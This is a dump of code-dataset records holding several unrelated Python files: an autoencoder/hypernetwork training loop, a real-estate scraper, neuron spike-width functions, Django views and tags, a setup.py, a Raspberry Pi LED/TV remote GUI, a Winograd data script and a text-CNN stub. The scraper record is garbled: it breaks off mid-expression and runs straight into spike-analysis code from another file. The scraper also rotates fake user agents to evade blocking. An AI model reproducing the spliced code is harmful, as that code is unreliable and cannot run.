\"\"\"\ndef perm_data(x, y):\n perm = torch.randperm(len(x))\n x_perm = x[perm, :]\n y_perm = y[perm]\n return x_perm.cuda(), y_perm.cuda()\n\n\ndef create_data(n=2):\n dist1 = MultivariateNormal(torch.tensor([4.0, 4.0]), torch.eye(2)*.05)\n dist2 = MultivariateNormal(torch.tensor([6.0, 4.0]), torch.eye(2)*.05)\n dist3 = MultivariateNormal(torch.tensor([5.0, 7.0]), torch.eye(2)*.05)\n p1 = dist1.sample((n,))\n p2 = dist2.sample((n,))\n p3 = dist3.sample((n,))\n x = torch.stack([p1, p2, p3]).view(-1, 2).cuda()\n y_base = torch.ones(n)\n y = torch.stack([y_base*0, y_base, y_base*2]).long().view(-1).cuda()\n plot_data(x.cpu(), y.cpu(), 'gaussian_2')\n return x, y\n\n\ndef train(args):\n \n 
mixer = models.MixerS(args).cuda()\n E1 = models.GeneratorE1(args).cuda()\n E2 = models.GeneratorE2(args).cuda()\n D1 = models.GeneratorD1(args).cuda()\n D2 = models.GeneratorD2(args).cuda()\n netD = models.DiscriminatorZ(args).cuda()\n print (mixer, E1, E2, D1, D2)\n\n optimE = optim.Adam(mixer.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimE1 = optim.Adam(E1.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimE2 = optim.Adam(E2.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimD1 = optim.Adam(D1.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimD2 = optim.Adam(D2.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimD = optim.Adam(netD.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-4)\n \n best_test_acc, best_clf_acc, best_test_loss, = 0., 0., np.inf\n args.best_loss, args.best_acc = best_test_loss, best_test_acc\n args.best_clf_loss, args.best_clf_acc = np.inf, 0\n\n print ('==> Creating 4 Gaussians')\n data, targets = create_data()\n one = torch.tensor(1.).cuda()\n mone = one * -1\n print (\"==> pretraining encoder\")\n j = 0\n final = 100.\n e_batch_size = 1000\n if args.pretrain_e is True:\n for j in range(100):\n x = torch.randn(e_batch_size, args.ze).cuda()\n qz = torch.randn(e_batch_size, args.z*4).cuda()\n codes = torch.stack(mixer(x)).view(-1, args.z*4)\n mean_loss, cov_loss = ops.pretrain_loss(codes, qz)\n loss = mean_loss + cov_loss\n loss.backward()\n optimE.step()\n mixer.zero_grad()\n print ('Pretrain Enc iter: {}, Mean Loss: {}, Cov Loss: {}'.format(\n j, mean_loss.item(), cov_loss.item()))\n final = loss.item()\n if loss.item() < 0.1:\n print ('Finished Pretraining Encoder')\n break\n\n print ('==> Begin Training')\n for epoch in range(args.epochs):\n data, targets = perm_data(data, targets)\n z = torch.randn(args.batch_size, args.ze).cuda()\n ze = torch.randn(args.batch_size, args.z).cuda()\n qz = torch.randn(args.batch_size, args.z*4).cuda()\n 
optimE.zero_grad()\n optimD.zero_grad()\n \n codes = mixer(z)\n noise = torch.randn(args.batch_size, args.ze*4)\n log_pz = ops.log_density(ze, 2).view(-1, 1)\n d_loss, d_q = ops.calc_d_loss(args, netD, ze, codes, log_pz)\n d_loss.backward(retain_graph=True)\n optimD.step()\n optimE.step()\n\n \n optimE.zero_grad()\n optimD.zero_grad()\n optimE1.zero_grad()\n optimE2.zero_grad()\n optimD1.zero_grad()\n optimD2.zero_grad()\n\n l1w, l1b = E1(codes[0])\n l2w, l2b = E2(codes[1])\n l3w, l3b = D1(codes[2])\n l4w, l4b = D2(codes[3])\n layers_all = [l1w, l1b, l2w, l2b, l3w, l3b, l4w, l4b]\n clf_loss = 0\n for i, (layers) in enumerate(zip(*layers_all)):\n loss = train_nn(args, layers, data, targets)\n clf_loss += loss\n G_loss = clf_loss / args.batch_size\n G_loss.backward()\n total_hyper_loss = G_loss #+ (gp.sum().cuda())#mean().cuda()\n \n optimE.step()\n optimE1.step() \n optimE2.step()\n optimD1.step()\n optimD2.step()\n\n total_loss = total_hyper_loss.item()\n \n if epoch % 2 == 0:\n print ('**************************************')\n print ('AE-MD Loss: {}, D loss: {}'.format(total_hyper_loss, d_loss))\n print ('**************************************')\n #if epoch > 100:\n with torch.no_grad():\n #test_far_data(mixer, W1, W2)\n get_points(mixer, [E1, E2, D1, D2], epoch) \n #utils.save_hypernet_toy(args, [mixer, netD, W1, W2], test_acc)\n\n\nif __name__ == '__main__':\n args = load_args()\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n #import arch.toy_tiny_gen as models\n import arch.ae_models as models\n train(args)\n","sub_path":"hyperAE.py","file_name":"hyperAE.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322445970","text":"import requests\nfrom bs4 import BeautifulSoup\n#from selenium import webdriver\nimport webbrowser\nimport random, sys\nfrom time import sleep as wait\nimport pandas as pd\nimport re #is this even used?\nimport 
atexit\n\n\"\"\"\n#https://www.geeksforgeeks.org/how-to-exit-a-python-script/\ndef exit_handler():\n print('My application is ending!')\natexit.register(exit_handler)\nprint('GFG!')\nsys.exit()\n\"\"\"\n#https://www.scrapehero.com/how-to-rotate-proxies-and-ip-addresses-using-python-3/\n#try to do this so that the code can constantly keep working instead of breaking every 10\n\n#if the code keeps running, it will get copies of its self but will get a few morer from the web\n\n#https://pypi.org/project/fake-useragent/\n#antiblocking measures\nfrom fake_useragent import UserAgent\nua = UserAgent()\nUser_Agent = str(ua.random) #always gets a random UserAgent\n#User_Agent = \"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36\"\n#print(User_Agent)\n#User_Agent = \"*\"\ntownname_ = \"Bayonne\"\n#townname_ = 'Guttenberg'\n#townname_ = 'North Bergen'\n#townname_ = 'Union City'\n#townname_ = 'Jersey City'\n#townname_ = \"Newark\"\n#.capitalize() capitalizes the word\n#townname_ = str(input(\"Name of Town: \")).lower()\n#townname_ = \"East Rutherford\"\n\n\ntry:\n townname = townname_.split(\" \")\n townname_space = townname[0].capitalize()+\" \"+townname[1].capitalize()\n townname = townname[0].capitalize()+\"-\"+townname[1].capitalize() #townname used for zumper\n #rtownname = townname[0]+#townname used for realtor.com\nexcept:\n townname = townname_.capitalize()\n townname_space = townname\n pass\n\n\ntry:\n # finds dataframe \n folders = \"/Users/juanm./Documents/Coding/Data Science?/github/Webscrapper-Real-Estate/Not Working/\"\n og_filename = townname+'.csv'\n og_df = pd.read_csv(folders+og_filename) \n # reads the already there file\n i = og_df.i.to_list() #creates i into its own list\n #start = og_df[\"i\"].tail(1)\n #start = len(og_df) #finds the length of the dataframe\n \"\"\"\n if i[-1] 0:\n try: # Use threshold to compute half-max.\n y = np.array(s)\n dvdt = np.diff(y)\n trigger = dvdt.max()/10\n 
x_loc = int(np.where(dvdt >= trigger)[0][0])\n thresh = (s[x_loc]+s[x_loc+1])/2\n mid = (high+thresh)/2\n except: # Use minimum value to compute half-max.\n sciunit.log((\"Could not compute threshold; using pre-spike \"\n \"minimum to compute width\"))\n low = np.min(s[:x_high])\n mid = (high+low)/2\n n_samples = sum(s>mid) # Number of samples above the half-max.\n widths.append(n_samples)\n widths = np.array(widths,dtype='float')\n if n_spikes:\n # Convert from samples to time.\n widths = widths*spike_waveforms.sampling_period\n return widths\n\ndef spikes2thresholds(spike_waveforms):\n \"\"\"\n IN:\n spike_waveforms: Spike waveforms, e.g. from get_spike_waveforms().\n neo.core.AnalogSignal\n OUT:\n 1D numpy array of spike thresholds, specifically the membrane potential\n at which 1/10 the maximum slope is reached.\n\n If the derivative contains NaNs, probably because vm contains NaNs\n Return an empty list with the appropriate units\n\n \"\"\"\n\n n_spikes = spike_waveforms.shape[1]\n thresholds = []\n for i in range(n_spikes):\n s = spike_waveforms[:,i].squeeze()\n s = np.array(s)\n dvdt = np.diff(s)\n import math\n for j in dvdt:\n if math.isnan(j):\n return thresholds * spike_waveforms.units\n\n trigger = dvdt.max()/10\n x_loc = np.where(dvdt >= trigger)[0][0]\n thresh = (s[x_loc]+s[x_loc+1])/2\n thresholds.append(thresh)\n return thresholds * spike_waveforms.units\n","sub_path":"neuronunit/neuronunit/capabilities/spike_functions.py","file_name":"spike_functions.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"606119862","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import render, get_object_or_404\n\nfrom main.models import Category, Product\n\n\ndef category(request, slug):\n c = get_object_or_404(Category, slug=slug)\n\n products = Product.objects.filter(category=c)\n\n return render(request, 'category.html', {\n 'category': c,\n 'products': 
products\n })\n","sub_path":"main/views/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"418322937","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"The setup script.\"\"\"\n\nimport sys\nfrom setuptools import setup, find_packages\n\n__author__ = \"XESS Corp.\"\n__email__ = \"info@xess.com\"\n__version__ = \"0.4.0\"\n\nif \"sdist\" in sys.argv[1:]:\n with open(\"zyc/pckg_info.py\", \"w\") as f:\n for name in [\"__version__\", \"__author__\", \"__email__\"]:\n f.write(\"{} = '{}'\\n\".format(name, locals()[name]))\n\nwith open(\"README.rst\") as readme_file:\n readme = readme_file.read()\n\nwith open(\"HISTORY.rst\") as history_file:\n history = history_file.read()\n\nrequirements = [\n \"skidl >= 0.0.27\",\n \"kinparse >= 0.1.0\",\n 'enum34; python_version < \"3.0\"',\n \"wxpython >= 4.0.7\",\n \"pykicad\",\n]\n\nsetup_requirements = []\n\ntest_requirements = []\n\nsetup(\n author=__author__,\n author_email=__email__,\n version=__version__,\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Manufacturing\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n description=\"A GUI for searching and selecting parts and footprints for use in SKiDL.\",\n entry_points={\"gui_scripts\": [\"zyc = zyc.zyc:main\"]},\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + \"\\n\\n\" + history,\n include_package_data=True,\n keywords=\"zyc\",\n name=\"zyc\",\n packages=find_packages(include=[\"zyc\"]),\n 
setup_requires=setup_requirements,\n test_suite=\"tests\",\n tests_require=test_requirements,\n url=\"https://github.com/xesscorp/zyc\",\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"104847583","text":"#!/usr/bin/env python3\nfrom tkinter import *\nfrom tkinter.colorchooser import *\nimport sys\nimport pigpio\nimport subprocess\nimport threading\nimport time\n\npi = pigpio.pi()\n\n#global variables\nLedOn = False\neffectOn = False\nsizeX = 800\nsizeY = 480\nLEDRED=0\nLEDGREEN=0\nLEDBLUE=0\npin = [17,22,27]\neffectChosen = 0\n\n\n\ndef exit():\n pi.set_PWM_dutycycle(pin[0], 0)\n pi.set_PWM_dutycycle(pin[1], 0)\n pi.set_PWM_dutycycle(pin[2], 0)\n sys.exit()\n\n#forget object placement\ndef forget(list):\n for i in list:\n i.place_forget()\n\n#place objects into frame\ndef place(list1, list2):\n j = 0\n if((len(list2) / len(list1)) == 2):\n for i in list1:\n i.place(x=list2[j], y=list2[j+1])\n j+=2\n else:\n for i in list1:\n i.place(x=list2[j], y=list2[j+1], width=list2[j+2])\n j+=3\n\n#translate rgb colour to hex\ndef translate(rgb):\n return \"#%02x%02x%02x\" % rgb\n\n#samsung menu\ndef Samsung():\n forget(menuList)\n place(samsungList, samsungListCoord)\n\n#led menu\ndef Led():\n forget(menuList)\n forget(coloursList)\n forget(effectsList)\n place(ledList, ledListCoord)\n\n#colour pick menu\ndef Colours():\n forget(ledList)\n place(coloursList, coloursListCoord)\n\n#update frame to show colour\ndef updateColour(s):\n colourFrame.configure(bg= translate((colourR.get(), colourG.get(), colourB.get())))\n\ndef selectColour():\n if LedOn:\n subprocess.call([\"sudo\", \"pkill\", \"-f\", \"ledEffect.py\"])\n global effectOn\n effectOn = False\n global LEDRED\n LEDRED = colourR.get()\n pi.set_PWM_dutycycle(pin[0], LEDRED)\n global LEDGREEN\n LEDGREEN = colourG.get()\n pi.set_PWM_dutycycle(pin[1], 
LEDGREEN)\n global LEDBLUE\n LEDBLUE = colourB.get()\n pi.set_PWM_dutycycle(pin[2], LEDBLUE)\n\ndef LedPower():\n global LedOn\n if LedOn:\n subprocess.call([\"sudo\", \"pkill\", \"-f\", \"ledEffect.py\"])\n pi.set_PWM_dutycycle(pin[0], 0)\n pi.set_PWM_dutycycle(pin[1], 0)\n pi.set_PWM_dutycycle(pin[2], 0)\n LedOn = False\n else:\n LedOn = True\n selectColour()\n\ndef sleep():\n pass\n\n#effects menu\ndef Effects():\n forget(ledList)\n place(effectsList, effectsListCoord)\n\ndef callEffect():\n subprocess.call([\"sudo\", \"python3\", \"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/ledEffect.py\", str(effectChosen)])\n\ndef selectEffect():\n if LedOn:\n subprocess.call([\"sudo\", \"pkill\", \"-f\", \"ledEffect.py\"])\n effectOn = True\n t1 = threading.Thread(target=callEffect)\n t1.start()\n\ndef runEffect(li, eff):\n r = li[eff][0]\n g = li[eff][1]\n b = li[eff][2]\n i = 3\n global effectChosen\n effectChosen = eff\n while i < len(li[eff]):\n red = li[eff][i%len(li[eff])]\n green = li[eff][(i+1)%len(li[eff])]\n blue = li[eff][(i+2)%len(li[eff])]\n i+=3\n while ( r != red or g != green or b != blue ):\n if ( r < red ):\n r += 1\n if ( r > red ):\n r -= 1\n\n if ( g < green ):\n g += 1\n if ( g > green ):\n g -= 1\n\n if ( b < blue ):\n b += 1\n if ( b > blue ):\n b -= 1\n\n effectColourFrame.after(5,sleep())\n effectColourFrame.configure(bg= translate((r,g,b)))\n root.update()\n\ndef pBtn():\n PowerB.place(x=50, y=380)\n\n#main menu\ndef menu():\n forget(samsungList)\n forget(ledList)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n place(menuList, menuListCoord)\n\n# def tick():\n# time1.set(time.strftime(\"%H:%M:%S\"))\n# clock.after(500, tick)\n\nroot = Tk()\nroot.geometry(str(sizeX) + \"x\" + str(sizeY))\nroot.configure(bg=\"black\")\nroot.attributes(\"-fullscreen\", True)\nroot.config(cursor=\"none\")\n\ntitle = Frame(root).place(width = sizeX, height = 150, x = 0, y = 0)\nversion = Frame(root).place(width = sizeX, height = sizeY, x = 0, y = 
0)\n# time = Frame(root).place(width = sizeX, height = sizeY, x = 0, y = 0)\nmain = Frame(root)\n\nmain.place(width = sizeX, height = sizeY, x = 0, y = 0)\nbg1 = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/bg1.png\")\nbackground_label = Label(main, image=bg1)\npwr = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/pwrBtn.png\")\npwr2 = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/pwr2.png\")\nvolUp = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/volUp.png\")\nvolDown = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/volDown.png\")\nvolMute = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/volMute.png\")\nplus = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/plus.png\")\nminus = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/minus.png\")\nrgbImg = PhotoImage(file=\"/home/pi/Desktop/github/Desktop-Remote/Python(Rasp)/images/rgbImg2.png\")\nrgbPic = Label(root, image=rgbImg)\n\n# root.after(1000, tick)\n\n#Labels\n# time1 = StringVar()\n# time1.set(time.strftime(\"%H:%M:%S\"))\ntitle = Label(title, text=\"Desktop Remote\", bg=\"#ff0c85\", fg=\"#ffc9e3\", font=(\"Arial\", 44))\nversion = Label(version, text=\"v2.0\", bg=\"#ff0c85\", fg=\"#ffc9e3\", font=(\"Arial\", 20))\n# clock = Label(main, textvariable=time1, bg=\"#ff0c85\", fg=\"#ffc9e3\", font=(\"Arial\", 20))\n\n#----Menu------------------------------------------------------------------------------------------------------------\nLedB = Button(main, text=\"LED\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Led)\nSamsungB = Button(main, text=\"Samsung\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Samsung)\n\nPowerB = Button(image=pwr, command=exit)\nPowerB[\"bg\"] = \"black\"\nPowerB[\"border\"] = \"0\"\n\nmenuList = [title, version, LedB, 
SamsungB]\nmenuListCoord = [140,0,520 , 720,440,80 , 100,240,200 , 500,240,200]\n\n#----Universal------------------------------------------------------------------------------------------------------------\nbackBtn = Button(main, text=\"BACK\", bg=\"black\", fg=\"white\", font=(\"Arial\", 20), command=menu)\nbackLedBtn = Button(main, text=\"BACK\", bg=\"black\", fg=\"white\", font=(\"Arial\", 20), command=Led)\n\n#----Samsung------------------------------------------------------------------------------------------------------------\nSamPwrB = Button(image=pwr2)\nSamSource = Button(main, text=\"Source\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20))\nSamVolumeUp = Button(image=volUp)\nSamVolumeDown = Button(image=volDown)\nSamVolumeMute = Button(image=volMute)\nSamPlus = Button(image=plus)\nSamMinus = Button(image=minus)\n\nsamsungList = [SamPwrB, SamSource, SamVolumeUp, SamVolumeDown, SamVolumeMute, SamPlus, SamMinus, backBtn]\nsamsungListCoord = [50,120 , 480,75 , 240,60, 240,340 , 240,200 , 490,200 , 490,340 , 50,50]\n\n#----LED------------------------------------------------------------------------------------------------------------\nLedPwrB = Button(image=pwr2, command=LedPower)\nLedColours = Button(main, text=\"Colours\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Colours)\nLedEffects = Button(main, text=\"Effects\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=Effects)\n\nledList = [LedPwrB, rgbPic, LedColours, LedEffects, backBtn]\nledListCoord = [50,120 , 200,75 , 275,350 , 550,350 , 50,50]\n\n#----Colours------------------------------------------------------------------------------------------------------------\ncolourR = Scale(main, bg=\"#f24f43\", fg=\"white\", from_=255, to=0, showvalue=0, font=(\"Arial\", 12), length=200, width=50, command=updateColour)\ncolourR.set(255)\ncolourG = Scale(main, bg=\"#47ce35\", fg=\"white\", from_=255, to=0, showvalue=0, font=(\"Arial\", 12), length=200, width=50, 
command=updateColour)\ncolourG.set(255)\ncolourB = Scale(main, bg=\"#3553ce\", fg=\"white\", from_=255, to=0, showvalue=0, font=(\"Arial\", 12), length=200, width=50, command=updateColour)\ncolourB.set(255)\nbrightness = Scale(main, bg=\"black\", fg=\"white\", from_=1, to=256, showvalue=0, font=(\"Arial\", 12), orient=HORIZONTAL, length=200, width=30)\nbrightness.set(255)\ncolourBlackFrame = Frame(root, width=110, height=110, bg=\"#52565e\")\ncolourFrame = Frame(root, width=100, height=100, bg= translate((colourR.get(), colourG.get(), colourB.get())))\nsetColour = Button(main, text=\"Set Colour\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=selectColour)\n\ncoloursList = [LedPwrB, colourR , colourG , colourB, colourFrame, colourBlackFrame, setColour, backLedBtn]\ncoloursListCoord = [50,120 , 200,125 , 300,125 , 400,125 , 505,140 , 500,135 , 480,270 , 50,50]\n\n#----Effects------------------------------------------------------------------------------------------------------------\neffectColourBlackFrame = Frame(root, width=110, height=110, bg=\"#52565e\")\neffectColourFrame = Frame(root, width=100, height=100, bg=\"white\")\nclrEffectList = [\n[255,0,255,0,255,255,255,0,255]\n,[255,0,0 , 255,128,0 , 255,255,0 , 128,255,0 , 0,255,0 , 0,255,128 , 0,255,255 , 0,128,255 , 0,0,255 , 128,0,255 , 255,0,255 , 255,0,255 , 255,0,128 , 255,0,0]\n,[255,0,255,0,0,0,255,0,255]\n,[128,0,255,0,0,0,128,0,255]\n,[0,255,255,0,0,0,0,255,255]\n,[255,0,255,128,0,255,255,0,255]\n]\nEffect1 = Button(main, text=\"Effect1\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 0))\nEffect2 = Button(main, text=\"Effect2\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 1))\nEffect3 = Button(main, text=\"Effect3\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 2))\nEffect4 = Button(main, text=\"Effect4\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), 
command=lambda: runEffect(clrEffectList, 3))\nEffect5 = Button(main, text=\"Effect5\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 4))\nEffect6 = Button(main, text=\"Effect6\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=lambda: runEffect(clrEffectList, 5))\nsetEffect = Button(main, text=\"Set Effect\", bg=\"white\", fg=\"black\", font=(\"Arial\", 20), command=selectEffect)\n\neffectsList = [LedPwrB, Effect1, Effect2, Effect3, Effect4, Effect5, Effect6, effectColourFrame, effectColourBlackFrame, setEffect, backLedBtn]\neffectsListCoord = [50,120 , 200,150 , 350,150 , 500,150 , 200,250 , 350,250 , 500,250 , 650,130 , 645,125 , 630,250 , 50,50]\n\nmenu()\npBtn()\nroot.mainloop()\n","sub_path":"framework/reign.py","file_name":"reign.py","file_ext":"py","file_size_in_byte":10391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"449853273","text":"\nfrom django import template\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nfrom django.http.request import QueryDict\n\nregister = template.Library()\n\n@register.simple_tag\ndef show_info(request):\n path = request.path\n if path == reverse('customer'):\n return mark_safe('')\n else:\n return mark_safe('')\n\n# 拼接路径,编辑之后跳转回原页面\n@register.simple_tag\ndef reverse_url(url_name,id,request):\n\n # /editcustomer/3/?next=/customers/?page=4\n path = request.get_full_path()\n query_dict_obj = QueryDict(mutable=True)\n query_dict_obj['next'] = path #\n encode_url = query_dict_obj.urlencode() #next=/customers/?search_field=qq__contains&keyword=1&page=4\n # url编码:\n #next=%2Fcustomers%2F%3Fsearch_field%3Dqq__contains%26keyword%3D1%26page%3D4\n #next=%2Fcustomers%2F%3Fsearch_field%3Dqq__contains%26keyword%3D1%26page%3D4\n\n\n # ?a=1&b=2\n # request.GET = queryDict({'a':1,'b':2})\n # request.GET.urlencode() -- a=1&b=2\n\n 
#queryDict({'next':'/customers/?search_field=qq__contains&keyword=1&page=4'})\n\n\n #/customers/?page=4 #/customers/?search_field=qq__contains&keyword=1&page=4\n prefix_path = reverse(url_name,args=(id,)) #/editcustomer/3/\n\n full_path = prefix_path + '?' + encode_url\n\n return full_path\n# print(type(request.GET)) # request.GET.urlencode()\n##http://127.0.0.1:8000/editcustomer/116/?next=/customers/?search_field=qq__contains&keyword=1&page=4\n\n# 跳转回的路径: http://127.0.0.1:8000/customers/?search_field=qq__contains&keyword=1&page=4","sub_path":"oldbeast/insects/templatetags/mytag.py","file_name":"mytag.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"601945433","text":"from enum import Enum\n\nTRANSLATIONS = {\"triangle\": \"TRIANGLE\", \"cercle\": \"CIRCLE\", \"carre\": \"SQUARE\", \"pentagone\": \"PENTAGON\"}\n\n\nclass Shape(str, Enum):\n TRIANGLE = \"TRIANGLE\"\n SQUARE = \"SQUARE\"\n CIRCLE = \"CIRCLE\"\n PENTAGON = \"PENTAGON\"\n\n @staticmethod\n def translate(shape):\n return Shape(TRANSLATIONS.get(shape.lower()))\n","sub_path":"anesthetic/blood/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63232004","text":"\"\"\"\nThis script prepares the wsc data into a csv file, ready for annotationg\n\"\"\"\n\nimport argparse\n\nfrom winohard.utils import read_jsonl, write_jsonl\n\n\ndef find_unique(s1, s2):\n s1_split = s1.split()\n s2_split = s2.split()\n\n for w1, w2 in zip(s1_split, s2_split):\n if w1 != w2:\n return w1, w2\n\n\ndef main():\n parse = argparse.ArgumentParser(\"\")\n parse.add_argument(\"--in_data\", type=str, help=\"jsonl file\",\n default=\"/home/lazary/workspace/thesis/winohard/data/wsc/wsc.jsonl\")\n parse.add_argument(\"--out_data\", type=str, help=\"jsonl file\",\n 
default=\"/home/lazary/workspace/thesis/winohard/data/lms/wsc_lm.jsonl\")\n\n args = parse.parse_args()\n\n data = read_jsonl(args.in_data)\n\n # ignoring the triplet sentence, to keep the format valid\n data = data[:254] + data[255:]\n\n\n coupled_data = []\n for i in range(0, len(data) - 1, 2):\n couple = data[i], data[i + 1]\n coupled_data.append(couple)\n\n out_data = []\n\n for c1, c2 in coupled_data:\n s1 = c1['sentence']\n s2 = c2['sentence']\n w1, w2 = find_unique(s1, s2)\n s1_replace = s1.replace(w1, '[MASK]')\n option1 = c1['option1']\n s1_replace = s1_replace.replace('_', option1)\n\n s2_replace = s2.replace(w2, '[MASK]')\n option1 = c2['option2']\n s2_replace = s2_replace.replace('_', option1)\n\n if not s1_replace.endswith('.'):\n s1_replace += '.'\n if not s2_replace.endswith('.'):\n s2_replace += '.'\n\n if w1.endswith('.'):\n w1 = w1[:-1]\n if w2.endswith('.'):\n w2 = w2[:-1]\n\n # print(w1, s1_replace)\n # print(w2, s2_replace)\n if s1_replace.count('[MASK]') > 1:\n # print(w1, s1_replace)\n continue\n if s2_replace.count('[MASK]') > 1:\n continue\n\n out_data.append({'s1': s1_replace, 's2': s2_replace,\n 'ans1': w1, 'ans2': w2})\n\n write_jsonl(out_data, args.out_data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"winohard/transform_examples.py","file_name":"transform_examples.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"648460606","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttps://github.com/gaussic/text-classification\nThis scripts is to train on 500 samples, and test on the annotated samples.\nRun with python3 (****py36**** on tangra)\nWe didn't implement cross validation,\nbut simply run `python cnn_mxnet.py` for multiple times,\nthe average accuracy is close to 78%.\n\n\n# below is the original readme. 
#####\nThis example demonstrates the use of Conv1D for CNN text classification.\nOriginal paper could be found at: https://arxiv.org/abs/1408.5882\n\nThis is the baseline model: CNN-rand.\n\nThe implementation is based on PyTorch.\n\n\n\n\n\n\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader, TensorDataset\nimport numpy as np\nfrom sklearn import metrics\n\nfrom mr_loader import Corpus, read_vocab, process_text\n\nimport os\nimport time\nfrom datetime import timedelta\n\nfrom allennlp.modules.elmo import Elmo, batch_to_ids\n\n\n\n\noptions_file = \"/home/lily/zl379/Playing/bilm-tf/mmc_new/options.json\"\nweight_file = \"/home/lily/zl379/Playing/bilm-tf/dump/weights.hdf5\"\n\ntrain_path = '/home/lily/zl379/BioNLP/Disambiguation/50_normal/'\n\n\ntest_path = '/home/lily/zl379/BioNLP/test_data/'\n\ntesting_abbre = ['PDA','SBP']\n\n\nsave_path = 'checkpoints_balance' # model save path\nif not os.path.exists(save_path):\n os.mkdir(save_path)\n\n\nuse_cuda = torch.cuda.is_available()\n\n\nclass TCNNConfig(object):\n \"\"\"\n CNN Parameters\n \"\"\"\n\n file_path = train_path\n test_path = test_path\n # set abbreviation\n abbre = 'AB' # as default\n\n embedding_dim = 64 # embedding vector size\n seq_length = 200 # maximum length of sequence\n vocab_size = 8000 # most common words\n\n num_filters = 100 # number of the convolution filters (feature maps)\n kernel_sizes = [3, 4, 5] # three kind of kernels (windows)\n hidden_dim = 64 # hidden size of fully connected layer\n\n dropout_prob = 0.5 # how much probability to be dropped\n learning_rate = 1e-3 # learning rate\n batch_size = 50 # batch size for training\n num_epochs = 20 # total number of epochs\n\n num_classes = 3 # number of classes\n\n dev_split = 0.2 # percentage of dev data\n\n model_file = '' # save path\n k_fold = 0\n\nclass TextCNN(nn.Module):\n \"\"\"\n CNN text 
